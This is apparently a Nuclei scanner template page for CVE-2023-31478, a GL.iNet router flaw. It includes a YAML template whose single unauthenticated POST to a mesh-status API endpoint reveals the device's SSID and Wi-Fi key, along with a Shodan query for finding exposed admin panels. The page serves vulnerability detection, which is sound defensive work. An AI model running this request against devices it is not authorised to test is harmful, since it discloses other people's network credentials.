GL.iNET SSID Key Disclosure

ID: CVE-2023-31478

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2023,gl-inet,disclosure

Description

An issue was discovered on GL.iNet devices before 3.216. An API endpoint reveals information about the Wi-Fi configuration, including the SSID and key.

YAML Source

id: CVE-2023-31478

info:
  name: GL.iNET SSID Key Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    An issue was discovered on GL.iNet devices before 3.216. An API endpoint reveals information about the Wi-Fi configuration, including the SSID and key.
  reference:
    - https://www.gl-inet.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-31478
    epss-score: 0.00214
    epss-percentile: 0.41108
    cpe: cpe:2.3:o:gl-inet:gl-s20_firmware:*:*:*:*:*:*:*:*
  metadata:
    vendor: gl-inet
    product: gl-s20_firmware
    verified: true
    max-request: 1
    shodan-query: title:"GL.iNet Admin Panel"
  tags: cve,cve2023,gl-inet,disclosure

http:
  - raw:
      - |
        POST /api/router/mesh/status HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mac=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"ssid":'
          - '"encryption":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a299ce7ab074c01cf787bc11d22b08ae7e136f6e58687e2fd0b0fd61c7d40e9602205c47f75067b3489c9a27419a984b1096993f87226c36f325b480063c2f2e3a98:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-31478.yaml"

View on Github